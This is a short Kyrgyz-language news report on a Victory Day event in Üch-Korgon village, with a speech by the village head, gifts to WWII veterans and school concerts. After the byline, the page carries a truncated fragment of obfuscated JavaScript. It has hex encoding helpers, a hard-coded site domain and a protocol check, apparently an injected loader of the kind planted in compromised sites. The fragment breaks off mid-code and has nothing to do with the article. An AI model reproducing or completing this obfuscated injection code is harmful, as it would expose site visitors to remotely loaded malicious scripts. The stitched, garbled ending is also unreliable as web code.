Улуу Жеңиш күнүнө карата Улуу Ата — Мекендик Согушука катышкан ардагерлер чакырылып, сый көрсөтүлдү. Алардын урматына мекетпердин окуучулары тарабынан концерттик программалар тартууланды.
Улуу Жеңиш майрамы бугун Үч-Коргн айылындагы борбордук аянтта белгиленди. Анда Үч-Коргон айылынын өкмөтү Абдурахманов Ахматжан сөз алып согуш ардагерлерине жалпы Үч-Коргон айылынын тургундарынын атынан чоң ыраазычылыгын билдирди.
«Мына бүгүн биз жалпы Үч-Коргон айыл өкмөтү, айыл тургундары менен биргеликте Улуу Жеңиш майрамын дагы бир ирет белгилөөдөбүз. Жыл өткөнү сайын ардагерлерибиз саны азайып барууда. Биз аталарыбыздын эрдиктери үчүн ушул жакшы жашоого алып келгендиктери үчүн канчалык сый-урмат көрсөтсөк ошончо аз»,- деп билдирди айыл башчысы Абдурахманов Ахмаджан.
1941 — 1945 жылдардагы курман болгон баатырлардын эстелигине гул коюлуп маркумдардын урматына дуба окулду.Улуу Жеңиштин ардагерлери Хотамов Умарали жана Тойгонбаев Шамайга 50 миң сомдон, меенет ардагерлерине беш миң сомдон берилди. Майрамдын экинчи бөлүгүндө ардагерлер жана келген айыл тургундарына концерттик программалар тартууланды.
Даярдаган: Нусраттулаев Сайёдбек
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "uchkorgon.kyrgyzmedia.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e